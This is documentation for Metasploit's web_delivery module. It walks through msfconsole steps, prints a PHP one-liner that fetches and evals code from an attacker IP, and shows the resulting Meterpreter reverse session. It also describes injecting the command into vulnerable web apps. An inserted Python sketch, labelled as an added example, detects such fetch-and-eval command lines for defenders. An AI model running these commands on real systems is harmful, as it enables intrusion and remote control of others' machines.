metasploit-gs/documentation/modules/exploit/multi/script/web_delivery.md
2016-03-02 19:52:11 -06:00


web_delivery runs a web server that provides a great way to deliver a payload during post-exploitation. It is intended to stay stealthy because the payload does not touch the disk.

Currently, web_delivery supports three different languages for delivery: Python, PHP, and Powershell. You should be able to tell which one you can use based on the target environment you are in.

For example, if you have gained access through a PHP application, then it's safe to assume you can use PHP. If you're on a Windows server (such as Windows Server 2008), then it's probably safe to say the target supports Powershell.

Verification Steps

To be able to use web_delivery, you must gain access to the target machine first, with the ability to execute the Python, PHP, or Powershell interpreter.

At that point, you would use web_delivery similar to the following example:

  1. Start msfconsole
  2. Do: use exploit/multi/script/web_delivery
  3. Do: set target 1 (1 is PHP. You can use show targets to see other options)
  4. Do: set PAYLOAD php/meterpreter/reverse_tcp (You can do show payloads to see what options are suitable for the target)
  5. Do: set LHOST IP (The IP the payload should connect back to)
  6. Do: run
  7. At this point, a handler is up for that payload, and the module should instruct you to execute a command.
  8. Copy the command. Depending on your pentesting scenario, typically you can either inject the command and get code execution, or run it from the target's shell, and get a session:
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.23.1:4444 
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/z5inGkwCCQiz9
[*] Local IP: http://10.6.0.86:8080/z5inGkwCCQiz9
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.23.1:8080/z5inGkwCCQiz9'));"
[*] Delivering Payload
[*] Sending stage (33684 bytes) to 172.16.23.134
[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.134:41684) at 2016-03-02 11:41:34 -0600
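
From the defender's side, the command the module prints in the run above has a recognizable shape: an interpreter started with an inline-code flag, a remote URL, and an eval primitive. The following detection sketch is an added example, not part of the Metasploit documentation; the tab-separated log format, host names, timestamps and function names are constructed assumptions, and the rule generalizes from the PHP command shown to the other two interpreters the module targets.

```python
import re

# Interpreter name prefix -> flags that run code passed on the command line.
INLINE_FLAGS = {"php": {"-r"}, "python": {"-c"}, "powershell": {"-c", "-command"}}
URL = re.compile(r"https?://[^\s'\")]+", re.I)
# Calls that pull remote content, and primitives that evaluate a string as code.
FETCH = re.compile(r"file_get_contents|urlopen|downloadstring", re.I)
EVAL = re.compile(r"\b(?:eval|exec)\s*\(|\biex\b|invoke-expression", re.I)

def interpreter_of(argv0):
    """Map '/usr/bin/python3' or 'powershell.exe' to a key of INLINE_FLAGS, else None."""
    name = re.split(r"[\\/]", argv0.strip("\"'"))[-1].lower()
    return next((k for k in INLINE_FLAGS if name.startswith(k)), None)

def check_cmdline(cmdline):
    """Return a finding dict for a fetch-and-evaluate one-liner, else None."""
    tokens = cmdline.split()
    if not tokens:
        return None
    interp = interpreter_of(tokens[0])
    if interp is None:
        return None
    flags = {t.lower() for t in tokens[1:] if t.startswith("-")}
    url = URL.search(cmdline)
    # All three must hold: inline code, a remote URL, and an eval primitive.
    if not (flags & INLINE_FLAGS[interp] and url and EVAL.search(cmdline)):
        return None
    return {"interpreter": interp, "url": url.group(0),
            "fetch_call": bool(FETCH.search(cmdline))}

def scan(lines):
    """Scan 'timestamp<TAB>host<TAB>cmdline' records (constructed format)."""
    findings = []
    for line in lines:
        ts, host, cmdline = line.rstrip("\n").split("\t", 2)
        hit = check_cmdline(cmdline)
        if hit:
            findings.append({"time": ts, "host": host, **hit})
    return findings

# Constructed records; only the first command line comes from the run shown above.
SAMPLE_LOG = [
    "2016-03-02T11:41:33\tweb01\tphp -d allow_url_fopen=true -r \"eval(file_get_contents('http://172.16.23.1:8080/z5inGkwCCQiz9'));\"",
    "2016-03-02T11:42:10\tweb01\tphp -r \"echo PHP_VERSION;\"",
    "2016-03-02T11:43:02\tbuild01\tpython3 -c \"import urllib.request; print(urllib.request.urlopen('http://example.com/health').status)\"",
    "2016-03-02T11:44:45\tweb01\tcurl http://example.com/health",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Only the first record is flagged; the health-check one-liner fetches a URL but never evaluates the response, so it passes.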

Targets

Python

Python is a fairly popular language, especially on Unix-based systems. For example, it has come with Ubuntu Linux by default since 8.04, and it also comes with Debian and with Mac OS X since 10.3.

PHP

PHP is a fairly popular language for web servers, especially Apache.

Powershell/win

Powershell is a popular language for newer Windows systems. Windows 7 and Windows Server 2008 R2 are the first Windows versions to come with Powershell by default; older systems do not include it.

Scenarios

Against a compromised web application

web_delivery would work nicely for a web application with a command execution vulnerability.

One way to approach this would be:

  1. Start exploit/multi/script/web_delivery
  2. Use Burp Suite to intercept the HTTP/HTTPS request, and place the command in the parameter that results in arbitrary code execution.
  3. Hopefully the modified HTTP/HTTPS request is successful, and you should get a session.

Shell upgrade

web_delivery is also useful to upgrade a shell type payload to a meterpreter one.

Here's how that can be done:

  1. Start exploit/multi/script/web_delivery that generates/
  2. On msfconsole, interact with the shell, and copy/paste the command.
  3. You should get a meterpreter session.